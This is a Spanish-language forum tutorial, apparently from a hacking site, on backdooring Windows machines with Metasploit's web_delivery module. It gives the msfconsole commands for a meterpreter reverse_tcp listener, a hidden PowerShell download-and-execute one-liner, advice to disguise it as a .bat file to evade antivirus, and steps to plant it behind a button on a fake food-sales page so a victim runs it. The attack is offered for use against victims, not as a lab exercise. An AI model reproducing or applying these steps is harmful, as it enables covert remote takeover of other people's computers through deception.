comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Backdorizando Windows por medio de Web Delivery - Metasploit

  • 0 Respuestas
  • 1393 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    1.67%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Diciembre 03, 2016, 11:06:57 pm »


Saludos nuevamente mis queridos fieles lectores, en esta oportunidad les traigo un nuevo método de ataque de POST EXPLOTACIÓN por medio de un modulo llamado Web Delivery, que nos permite crear archivos "Maliciosos" con extensiones Python, php y powershell,  en este tutorial utilizaremos la extensión universal por defecto de windows ps - Powershell.

Primero arrancaremos el framework metasploit, luego configuraremos el respectivo exploit:


Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf > use exploit/multi/script/web_delivery - Estableciendo Web Delivery
LHOST => 192.168.1.35                              - Nuestra IP
LPORT => 8081                                           - Nuestro puerto de escucha
msf exploit(web_delivery) > set URIPATH / - Directorio PATH del servidor
msf exploit(web_delivery) > show targets 
msf exploit(web_delivery) > set target 2     - Escogimos 2 = PowerShell
msf exploit(web_delivery) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit

una ves entendido lo anterior, lo que hicimos fue crear nuestro servidor meterpreter en escucha y nos apareció lo siguiente en las lineas abajo


powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('No tienes permisos para ver links. Registrate o Entra con tu cuenta

Algunos quizás no tengan entendimiento de ello, se los simplificare de la siguiente manera, este es el código fuente del archivo powershell que nos permitirá obtener la conexión de nuestra victima una ves que ejecute dicho archivo.



Como vemos este archivo lo eh guardado en formato .bat, para camuflarlo de algunos AV, lo llame "hola.bat" y lo aloje a la carpeta: /var/www/html donde se almacena nuestro archivos del servidor local apache.

¿Ustedes se preguntaran porque?

Es simple porque pienso utilizar un index de una pagina de "Ventas" online de comida y adjuntar mi archivo infectado .bat en un botón.

Antes de pasar este proceso, activen su servidor apache:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@kali:/# service apache2  start


Les dejare un pequeño ejemplo:

Source original:

<input name="input" value="" onclick="setLocation('No tienes permisos para ver links. Registrate o Entra con tu cuenta')" type="button">


Source editado

<input name="input" value="" onclick="setLocation('192.168.1.35/hola.bat')" type="button">

solamente le reemplazan la URL original por su dirección de archivo.

Una vez hecho todo este proceso, le envían la URL a su victima en mi caso yo lo estoy asiendo en mi red local, ustedes pueden hacerlo desde una web externa si desean.



Como vemos en el momento que nuestra victima haga clic en el botón automáticamente se descargara nuestro archivo "hola.bat", entonces aquí viene lo mejor  "La curiosidad del ser humano, cuando se presenta una oportunidad", quiere decir que una ves la victima ejecute el archivo, tendremos su sesión meterpreter.




Espero hallan aprendido algo nuevo de este servidor, para mi es un placer enseñarle lo poco que se.
Saludos y éxitos!

 

¿Te gustó el post? COMPARTILO!



Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 2059
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Usando Javascript para ejecutar tareas en Windows [cmd]

Iniciado por Jimeno

Respuestas: 4
Vistas: 10368
Último mensaje Octubre 12, 2014, 07:10:26 pm
por syskc0
Crackear password de administrador en windows usando Backtrack 3

Iniciado por Devilboy

Respuestas: 3
Vistas: 3020
Último mensaje Marzo 24, 2010, 12:46:31 am
por ||•?¤?- SeCurity-?¤?•||
Como entrar en una maquina windows con recursos compartidos.

Iniciado por ANTRAX

Respuestas: 1
Vistas: 2425
Último mensaje Febrero 18, 2010, 02:27:46 pm
por OSX
Hackear servidor windows (ACTUALIZADO) + Cambiar DNS - By Ixidion13

Iniciado por Stiuvert

Respuestas: 0
Vistas: 2714
Último mensaje Abril 26, 2011, 06:05:06 pm
por Stiuvert